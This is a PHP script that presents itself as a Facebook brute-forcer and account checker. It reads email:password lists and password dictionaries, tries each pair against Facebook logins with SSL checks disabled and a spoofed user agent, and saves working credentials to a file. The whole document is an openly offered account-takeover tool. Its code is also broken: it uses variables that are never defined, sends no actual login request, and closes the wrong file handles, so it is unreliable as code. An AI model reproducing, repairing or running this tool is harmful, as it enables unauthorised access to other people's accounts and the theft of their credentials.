<?php
class
Facebook{
var
$file
=
'file.txt'
;
var
$file_email
=
'email.txt'
;
var
$dict
=
'dict.txt'
;
function
__construct(
$option
){
switch
(
$option
){
case
'-c'
:
$this
->logo();
$this
->_cek();
break
;
case
'-b'
:
$this
->logo();
$this
->_brute_forcing();
break
;
default
:
$this
->logo();
echo
"[!] Eg: php facebook.class.php [option]\n"
;
echo
"[+] option -c (cek) or -b (brute forcing)\n\n"
;
break
;
}
}
function
logo()
{
print_r('
.___ .__.__ _______ .___
__| _/_______ _|__| | ________ ____ \ _ \ __| _/____
/ __ |/ __ \ \/ / | | \___
/ /_/ \ ___/\ /| | |__/ /\ \___\ \_/ \/ /_/ \ ___/
\____ |\___ >\_/ |__|____/_____ \\___ >\_____ /\____ |\___ >
\/ \/ \/ \/ \/ \/ \/
Facebook Bruteforcer And Account Checker Attack v.1.2
coder : wenkhairu (c) 2012 devilzc0de
for
my Brother : airuel_shinobi (at) subussalam
');
print
"\n\n"
;
}
function
_cek_filesize(
$f
){
if
(
$s
=
filesize
(
$f
)){
if
(
$s
<= 1024)
return
$s
.
" byte"
;
else
{
if
(
$s
<= 1024*1024) {
$s
=
round
(
$s
/ 1024,2);;
return
$s
.
" kb"
;
}
else
{
$s
=
round
(
$s
/ 1024 / 1024,2);
return
$s
.
" mb"
;
}
}
}
else
return
"???"
;
}
function
_do_login(
$email
,
$pass
){
preg_match(
'%Set-Cookie: ([^;]+);%'
,
$login
,
$hasil
);
preg_match_all(
'%Set-Cookie: ([^;]+);%'
,
$cek
,
$akhir
);
for
(
$i
=0;
$i
<
count
(
$akhir
[0]);
$i
++){
$cookie
.=
$akhir
[1][
$i
].
";"
;}
$is_login
=
$this
->login_checker(
$this
->url,null,
$cookie
,null);
if
(preg_match_all(
"(<a.*?href=[\"']([^\"']+)[\"'][^>]?>(.*?)</a>)i"
,
$is_login
,
$loged
)){
if
(
count
(
$loged
[0]) > 1){
echo
"[+] Login Success\n"
;
echo
"[+] Login With Email: "
.
$email
.
" And Password: "
.
$pass
.
"\n"
;
$this
->good_acc(
"[+] Login With Email: "
.
$email
.
" And Password: "
.
$pass
.
"\n"
);
}
else
{
echo
"[!] Login Failed\n"
;
}
}
else
{
echo
"[!] Login Failed\n"
;
}
}
function
_cek(){
$plain
=
fopen
(
$this
->file,
'r'
);
echo
"[+] Dictionary Size :"
.
$this
->_cek_filesize(
$this
->file).
"\n"
;
echo
"[+] Please Wait ....\n"
;
sleep(1);
echo
"[+] Starting At"
.
date
(
'd m Y H:i:s'
).
"\n"
;
while
(!
feof
(
$plain
))
{
$cek
=
explode
(
":"
,trim(
fgets
(
$plain
)));
$username
=
$cek
[0];
$password
=
$cek
[1];
$this
->_do_login(
$username
,
$password
);
echo
"[!] Resting... (5)s For Stable Connections\n"
;
sleep(10);
}
fclose(
$plain
);
}
function
_brute_forcing(){
$email_file
=
fopen
(
$this
->file_email,
'r'
);
echo
"[+] Dictionary Email Size :"
.
$this
->_cek_filesize(
$this
->file_email).
"\n"
;
$pass_file
=
fopen
(
$this
->dict,
'r'
);
echo
"[+] Dictionary Password Size :"
.
$this
->_cek_filesize(
$this
->dict).
"\n"
;
echo
"[+] Please Wait ....\n"
;
sleep(1);
echo
"[+] Starting At"
.
date
(
'd m Y H:i:s'
).
"\n"
;
while
(!
feof
(
$email_file
))
{
$username
= trim(
fgets
(
$email_file
));
while
(!
feof
(
$pass_file
))
{
$password
= trim(
fgets
(
$pass_file
));
$this
->_do_login(
$username
,
$password
);
echo
"[!] Resting... (5)s For Stable Connections\n"
;
sleep(10);
}
fclose(
$plain
);
}
fclose(
$plain
);
}
function
login_checker(
$url
,
$header
=NULL,
$cookie
=NULL,
$post
=NULL){
$ch
= curl_init();
curl_setopt(
$ch
, CURLOPT_HEADER,
$header
);
curl_setopt(
$ch
, CURLOPT_NOBODY,
$header
);
curl_setopt(
$ch
, CURLOPT_URL,
$url
);
curl_setopt(
$ch
, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt(
$ch
, CURLOPT_COOKIE,
$cookie
);
curl_setopt(
$ch
, CURLOPT_USERAGENT,
"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1) "
);
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
curl_setopt(
$ch
, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt(
$ch
, CURLOPT_FOLLOWLOCATION, 1);
if
(
$post
) {
curl_setopt(
$ch
, CURLOPT_CUSTOMREQUEST,
"POST"
);
curl_setopt(
$ch
, CURLOPT_POST, 1);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
$post
);
}
$result
= curl_exec(
$ch
);
if
(
$result
){
return
$result
;
}
else
{
return
curl_error(
$ch
);
}
curl_close(
$ch
);
}
function
good_acc(
$log
){
$file_name
=
"good_account.txt"
;
$fp
=
fopen
(
$file_name
,
"a+"
);
fwrite (
$fp
,
$log
);
fclose (
$fp
);
}
}
$tes
=
new
Facebook(
$argv
[1]);
?>